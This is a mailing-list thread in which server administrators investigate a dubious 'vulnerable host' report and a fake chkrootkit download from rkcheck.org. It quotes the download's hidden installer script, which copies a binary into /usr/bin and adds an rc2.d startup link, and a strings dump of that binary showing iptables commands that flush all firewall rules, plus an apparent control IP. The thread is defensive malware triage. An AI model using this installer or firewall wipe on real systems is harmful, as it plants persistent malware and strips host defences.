> Am 25.02.2015 um 21:25 schrieb Joseph Mingrone <jrm at ftfl.ca>: > > Philip Jocks <pjlists at netzkommune.com> writes: >> are those the only lines they sent you? Weirdly, we got a report like this today >> as well with the first (out of 8) sample line showing the exact time stamp >> (23/Feb/2015:14:53:37 +0100) and the exact query string >> (/?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7) which makes it >> a bit strange to be a coincidence. There is a webserver running in a jail on the >> reported IP address, but I can't find any log lines on our side that could be >> related. >> We asked the email.it folks for details, but haven't heard back from them yet. >> >> Philip > > Interesting. Yes, they sent nearly the same line about 8 times with the timestamps a > second or two apart. What other daemons are you running on that host? > Something other than the webserver could be compromised. > > Please share if you hear anything from email.it. > > Josephit felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope, nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains #!/bin/bash cp tests/.unit/test /usr/bin/rrsyncn chmod +x /usr/bin/rrsyncn rm -fr /etc/rc2.d/S98rsyncn ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn /usr/bin/rrsyncn exit That doesn't look like something you'd want on your box... Cheers, Philip
Philip Jocks <pjlists at netzkommune.com> writes:> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which > was registered a few days ago and looks like a tampered version of chkrootkit. I > hope, nobody installed it anywhere, it seems to execute > rkcheck/tests/.unit/test.sh which contains > > #!/bin/bash > > cp tests/.unit/test /usr/bin/rrsyncn > chmod +x /usr/bin/rrsyncn > rm -fr /etc/rc2.d/S98rsyncn > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > /usr/bin/rrsyncn > exit > > That doesn't look like something you'd want on your box...I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems. Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful. Joseph
> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote: > > it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope, nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains > > #!/bin/bash > > cp tests/.unit/test /usr/bin/rrsyncn > chmod +x /usr/bin/rrsyncn > rm -fr /etc/rc2.d/S98rsyncn > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > /usr/bin/rrsyncn > exit > > That doesn't look like something you'd want on your box?I filed a report with Google about that domain (Google Safe Browsing), briefly describing what?s been recounted here on this thread. It seems quite suspicious, agreed. Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting? take note what looks to be an IP address of 95.215.44.195. /bin/sh iptables -X 2> /dev/null iptables -F 2> /dev/null iptables -t nat -F 2> /dev/null iptables -t nat -X 2> /dev/null iptables -t mangle -F 2> /dev/null iptables -t mangle -X 2> /dev/null iptables -P INPUT ACCEPT 2> /dev/null iptables -P FORWARD ACCEPT 2> /dev/null iptables -P OUTPUT ACCEPT 2> /dev/null udevd 95.215.44.195 ;*3$"> Cheers, > > PhilipChris